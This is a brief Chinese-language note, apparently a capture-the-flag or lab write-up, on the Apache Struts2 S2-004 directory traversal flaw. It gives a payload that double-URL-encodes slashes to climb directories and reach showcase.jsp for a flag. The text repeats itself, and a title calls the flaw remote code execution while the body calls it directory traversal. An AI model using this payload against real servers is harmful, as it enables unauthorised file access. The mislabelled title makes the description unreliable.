S2-004存在目录遍历
s2-004是目录遍历漏洞。可通过…/返回上个目录。把/做二次url编码为%252f
payload
..%252f..%252f..%252f..%252f..%252f..%252fshowcase.jsp根据提示拿到key
Apache Struts2远程代码执行漏洞(S2-004)复现
S2-004存在目录遍历
s2-004是目录遍历漏洞。可通过…/返回上个目录。把/做二次url编码为%252f
payload
..%252f..%252f..%252f..%252f..%252f..%252fshowcase.jsp根据提示拿到key